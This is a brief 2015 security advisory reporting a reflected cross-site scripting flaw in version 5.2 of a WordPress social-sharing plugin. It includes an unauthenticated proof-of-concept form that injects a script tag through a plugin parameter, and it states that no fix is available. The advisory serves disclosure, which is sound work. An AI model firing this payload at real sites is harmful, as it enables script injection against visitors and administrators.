Title: WordPress '1-click Retweet/Share/Like' Plugin 
Version: 5.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/1-click-retweetsharelike/
- https://plugins.svn.wordpress.org/1-click-retweetsharelike/
Notified Vendor/WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ

## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.

PoC:
Submit the following request (no need to login first..)
<form method="POST" action="[URL]/wp-login.php"> 
 	<input type="text" name="lacandsnw_networkpub_key" value="&quot;><script>alert(1)</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.